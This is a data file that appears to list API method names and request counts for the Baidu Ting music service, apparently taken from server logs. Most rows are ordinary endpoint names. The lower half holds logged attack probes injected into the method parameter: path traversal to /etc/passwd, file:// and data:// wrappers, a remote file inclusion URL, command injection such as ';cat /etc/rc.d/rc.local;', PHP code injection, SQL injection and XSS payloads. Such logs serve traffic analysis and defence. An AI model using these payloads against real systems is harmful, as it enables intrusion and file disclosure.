baidu.ting.song.getInfos	56665258
baidu.ting.song.baseInfo	25187455
baidu.ting.search.lrcpic	23963091
baidu.ting.search.common	19085470
baidu.ting.search.catalogSug	18848384
baidu.ting.song.play	18079203
baidu.ting.user.listenAge	17388748
baidu.ting.song.down	8401688
baidu.ting.song.lry	8152477
baidu.ting.user.getUserBaseInfo	7795719
baidu.ting.artist.getSongList	5520410
baidu.ting.favorite.isCollect	5382304
baidu.ting.song.getInfo	4996382
baidu.ting.artist.getList	4864820
ting.baidu.diy.getPlaylists	4695490
baidu.ting.billboard.billList	4530060
baidu.ting.search.lrcys	4357538
baidu.ting.search.getPhotoInfos	4076314
baidu.ting.user.config	3388505
baidu.ting.game.gamedetail	2901814
baidu.ting.user.checkComVersion	2851603
baidu.ting.plaza.getRecommendAlbum	2739473
baidu.ting.artist.getInfo	2635943
baidu.ting.radio.playAction	2572636
baidu.ting.plaza.active	2571066
baidu.ting.active.start	2393295
	2383868
baidu.ting.diy.gedanInfo	2325650
baidu.ting.user.checkSuggestVersion	2194459
baidu.ting.user.getMessage	1846284
baidu.ting.diy.getNowOfficalList	1827209
baidu.ting.plaza.getFocusPic	1821920
baidu.ting.user.registToUC	1793385
baidu.ting.outerPassport.profile	1456660
baidu.ting.search.suggestion	1427622
baidu.ting.diy.gedanHot	1303672
baidu.ting.artist.getinfo	1272396
baidu.ting.album.getAlbumInfo	1264305
baidu.ting.radio.getChannelSong	1118906
baidu.ting.favorite.getCollectSong	1044451
baidu.ting.diy.addListenCount	1022345
baidu.ting.diy.category	947182
ting.baidu.plaza.recdaily	922028
baidu.ting.plaza.recdaily	899072
baidu.ting.artist.getAlbumList	855180
baidu.ting.plaza.getPartDesc	798193
baidu.ting.user.down	762701
baidu.ting.feedback.song	731990
baidu.ting.tag.songlist	658663
baidu.ting.song.audio	625503
baidu.ting.diy.gedan	604558
baidu.ting.tag.getHotTag	594702
baidu.ting.user.RegistToImsg	544595
baidu.ting.radio.getCategoryList	430533
baidu.ting.diy.getSongFromOfficalList	424392
baidu.ting.billboard.billCategory	366329
baidu.ting.search.lrcyss	338182
baidu.ting.search.getPhotoInfo	313518
baidu.ting.diy.getPlaylists	305687
baidu.ting.game.gamelist	241806
baidu.ting.song.buffer	223917
baidu.ting.artist.get72HotArtist	194603
baidu.ting.plaza.recommend	186390
baidu.ting.vip.checkVIPPromotion	176965
baidu.ting.favorite.getFavoriteSong	175362
baidu.ting.song.getMulInfos	171777
baidu.ting.favorite.addSongFavorites	130207
baidu.ting.favorite.addSongFavorite	109965
baidu.ting.diy.search	104116
baidu.ting.tag.getAllTag	102872
baidu.ting.video.getList	101379
baidu.ting.mv.getIndexMV	99966
baidu.ting.diy.getSimilarGedan	86004
baidu.ting.video.play	78686
baidu.ting.diy.getOfficialDiyList	74401
baidu.ting.artist.getInfoList	71515
baidu.ting.favorite.delCollectSong	44979
baidu.ting.user.checkVersion	40535
baidu.ting.plaza.getNewSongs	40174
ting.baidu.diy.getPlaylist	34293
baidu.ting.artist.getSpecialSongList	33421
baidu.ting.mv.playMV	31861
baidu.ting.radio.getArtistChannelSong	26453
baidu.ting.radio.getFavoriteSong	22067
baidu.ting.plaza.getArtistPlaza	17911
baidu.ting.diy.getPlaylist	15084
baidu.ting.radio.serv	14156
baidu.ting.artist.getHighSongTitle	12574
baidu.ting.feedback.crash	11533
baidu.ting.album.getList	10611
baidu.ting.diy.saveList	9723
ting.baidu.film.getFilmInfo	9283
baidu.ting.user.nplogin	8884
baidu.ting.favorite.delSongFavorite	8173
baidu.ting.mv.searchMV	8068
baidu.ting.video.category	7588
baidu.ting.song.cloud	7129
baidu.ting.song.getMulInfo	7123
ting.baidu.song.lry	6726
baidu.ting.artist.getQianQianArtist	6714
baidu.ting.diy.addListSong	6569
baidu.ting.weixin.response	5332
baidu.ting.song.playAAC	5210
baidu.ting.colorRing.listen	4821
baidu.ting.billboard.catalog	4460
baidu.ting.diy.delListSong	4429
baidu.ting.diy.delList	4420
baidu.ting.user.logout	3763
baidu.ting.user.regPassport	3700
baidu.ting.cloud.checkFile	3519
baidu.ting.artist.getHighSongList	3454
baidu.ting.cloud.record	3158
baidu.ting.colorRing.getCode	2983
ting.baidu.artistapp.renum	2741
baidu.ting.colorRing.authset	2537
baidu.ting.user.getMobileVcode	2521
baidu.ting.favorite.delSongFavorites	1873
baidu.ting.diy.getRecommendSpeical	1729
baidu.ting.feedback.info	1525
baidu.ting.favorite.getFavoriteAlbum	1497
baidu.ting.mv.getMultiSongMVInfo	1354
baidu.ting.cloud.expand	1334
baidu.ting.artist.getSongRank	1249
baidu.ting.artist.getSong	1237
ting.baidu.artistapp.brief	850
baidu.ting.diy.addList	802
baidu.ting.mv.getMVCategory	677
baidu.ting.favorite.getListenHistory	617
baidu.ting.video.recMv	579
ting.baidu.search.lrcpic	575
baidu.ting.cloud.signature	553
baidu.ting.diy.upList	444
baidu.ting.colorRing.subscribe	418
baidu.ting.favorite.getOffenListenList	398
baidu.ting.colorRing.toneset	341
baidu.ting.song.getHash	313
baidu.ting.user.activate	301
ting.baidu.plaza.getFocusPic	288
baidu.ting.song.getSuoSongInfo	281
baidu.ting.vip.checkUserExchange	248
baidu.ting.song.getPic	231
baidu.ting.artist.getInfoByName	230
baidu.ting.artistapp.photo	188
baidu.ting.favorite.getInfoFromView	186
baidu.ting.vip.exchangeVIP	177
baidu.ting.user.login	170
baidu.ting.favorite.addAlbumFavorite	137
baidu.ting.favorite.delAlbumFavorite	113
ting.baidu.artistapp.news	96
ting.baidu.artistapp.newList	86
baidu.ting.album.getAlbumstyle	49
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	41
baidu.ting.plaza.getMisNewSong	40
baidu.ting.user.addPassportInfo	39
ting.baidu.artistapp.briefs	38
(	27
\' (	27
baidu	18
ting.baidu.song.thirddown	12
ting.baidu.search.common	12
ting.baidu.artistapp.send	11
baidu.ting.game.catalog	11
ting.baidu.game.gamedetail	10
ting.baidu.mv.getArtistMVInfo	10
http://cirt.lnet/rfiinc.txt	9
../../../../../../../../../../etc/passwd	9
set	9
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	9
${@print(md5(812812))}	9
file:///etc/rc.d/rc.local_	9
file:///etc/passwd	9
data://text/plain;base64,dGVzdA==_	9
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	9
c:/windows/win.ini	9
/usr/bin/id;	9
data://text/plain;base64,dGVzdA==	9
../../../../../../../../../../etc/passwd_	9
1\\\";cat /etc/rc.d/rc.local;\\\"	9
1\';cat /etc/rc.d/rc.local;\'	9
file:///etc/rc.d/rc.local	9
string:{var_dump(md5(812812))}	9
1;cat /etc/rc.d/rc.local;	9
file:///etc/passwd_	9
%{	9
${	9
c:/windows/win.ini_	9
\'];${@print(md5(812812))};//	9
http://cirt.lnet/rfiinc.txt_	9
../../../../../../../../../../etc/rc.d/rc.local_	9
../../../../../../../../../../etc/rc.d/rc.local	9
baidu.ting.diy.getNowOfficalList\';alert(1);\'	8
ting.baidu.user.checkVersion	7
ting.baidu.diy.saveList	6
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
ting.baidu.search.playback	5
ting.baidu.game.catalog	5
ting.baidu.plaza.recommend	5
ting.baidu.plaza.active	5
ting.baidu.song.audio	5
ting.baidu.feedback.crash	5
ting.baidu.mv.getMultiSongMVInfo	5
ting.baidu.mv.getindexmv	5
ting.baidu.diy.gedan	5
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	5
ting.baidu.mv.playmv	5
baidu.ting.diy.getNowOfficalList>\'>\"><script>alert(1)</script>	4
baidu.ting.diy.getNowOfficalListjavascript:alert(1)	4
baidu.ting.diy.getNowOfficalList\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	4
baidu.ting.diy.getNowOfficalList\'>\"></title></textarea></script><img src=a onerror=alert(1)>	4
baidu.ting.diy.getNowOfficalList<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	4
baidu.ting.diy.getNowOfficalList(\')\'))(\")\'\"\"\"\")	4
baidu.ting.diy.getNowOfficalList\' and \'8281\'=\'8281	4
baidu.ting.diy.getNowOfficalList</textarea></title><script>alert(1)</script>	4
baidu.ting.diy.getNowOfficalList\'>\\\';</script>>\\\"><script>alert(1)</script>\'	4
baidu.ting.diy.getNowOfficalList\'\";alert(1);//	4
baidu.ting.diy.getNowOfficalList\"><img src=1 onerror=alert(1)>	4
baidu.ting.diy.getNowOfficalList</script><script>alert(1);//	4
baidu.ting.diy.getNowOfficalListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	4
ting.baidu.video.recMv	4
baidu.ting.diy.getNowOfficalList%\' and 8281=8281 and \'%\'=\'	4
baidu.ting.diy.getNowOfficalList\') and 8288=8288 and (\'	4
baidu.ting.diy.getNowOfficalList\";alert(1);\"	4
baidu.ting.diy.getNowOfficalList--></script><script>alert(1)</script>	4
baidu.ting.diy.getNowOfficalList<script>confirm(1)</script>	4
baidu.ting.diy.getNowOfficalList;alert(1);//	4
baidu.ting.favorite.getFavoriteSongCount	3
data://text/plain;base64,dGVzdA==_.php	3
ting.baidu.skin.getlist	3
ting.baidu.user.checkSuggestVersion	3
ting.baidu.cloud.signature	3
c:/windows/win.ini_.php	3
c:/windows/win.ini_.jpg	3
http://cirt.lnet/rfiinc.txt_.jpg	3
file:///etc/rc.d/rc.local_.jpeg	3
file:///etc/rc.d/rc.local_.htm	3
file:///etc/passwd_.jpeg	3
../../../../../../../../../../etc/rc.d/rc.local_.html	3
../../../../../../../../../../etc/rc.d/rc.local_.htm	3
baidu.ting.billboard.billListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
../../../../../../../../../../etc/passwd_.jpeg	3
baidu.ting.billboard.billList\';alert(1);\'	2
baidu.ting.song.play\' and \'8281\'=\'8281	2
data://text/plain;base64,dGVzdA==_.jpeg	2
data://text/plain;base64,dGVzdA==_.jpg	2
baidu.ting.song.play\';alert(1);\'	2
http://cirt.lnet/rfiinc.txt_.jpeg	2
http://10.42.7.217/?1387574401.31	2
http://10.42.7.217/?1387574394.68	2
http://10.42.7.217/?1387574377.43	2
http://10.42.7.217/?1387569180.86	2
http://10.42.7.217/?1387569157.69	2
http://10.42.7.217/?1387569086.12	2
http://10.42.7.217/?1387566997.86	2
http://10.42.7.217/?1387566988.07	2
http://10.42.7.217/?1387565604.69	2
baidu.ting.user.config?.10010.com	2
file:///etc/passwd_.jpg	2
http://cirt.lnet/rfiinc.txt_.htm	2
baidu.ting.song.play;alert(1);//	2
file:///etc/rc.d/rc.local_.jpg	2
ting.baidu.billboard.billlist	2
file:///etc/passwd_.html	2
c:/windows/win.ini_.html	2
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	2
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
../../../../../../../../../../etc/rc.d/rc.local_.jpg	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
baidu.ting.plaza.getRecommendAlbum\';alert(1);\'	2
baidu.ting.song.play<script>confirm(1)</script>	2
baidu.ting.song.play\') and 8288=8288 and (\'	2
../../../../../../../../../../etc/passwd_.jpg	2
../../../../../../../../../../etc/passwd_.php	2
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	2
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.billboard.billList\";alert(1);\"	1
baidu.ting.billboard.billList;alert(1);//	1
baidu.ting.plaza.getFocusPic;alert(1);//	1
data://text/plain;base64,dGVzdA==_.html	1
baidu.ting.song.playjavascript:alert(1)	1
data://text/plain;base64,dGVzdA==_.htm	1
baidu.ting.game.gamedetail?.10010.com	1
baidu.ting.song.play\'\";alert(1);//	1
baidu.ting.feedback.song?.10010.com	1
file:///etc/passwd_.php	1
baidu.ting.song.play\";alert(1);\"	1
baidu.ting.diy.category?.10010.com	1
baidu.ting.active.start?.10010.com	1
http://cirt.lnet/rfiinc.txt_.html	1
http://cirt.lnet/rfiinc.txt_.php	1
file:///etc/passwd_.htm	1
baidu.tquery=Text$$Stevie Hoang	1
baidu.ting.plaza.getRet=0	1
file:///etc/rc.d/rc.local_.php	1
baidu.ting.plazt=5	1
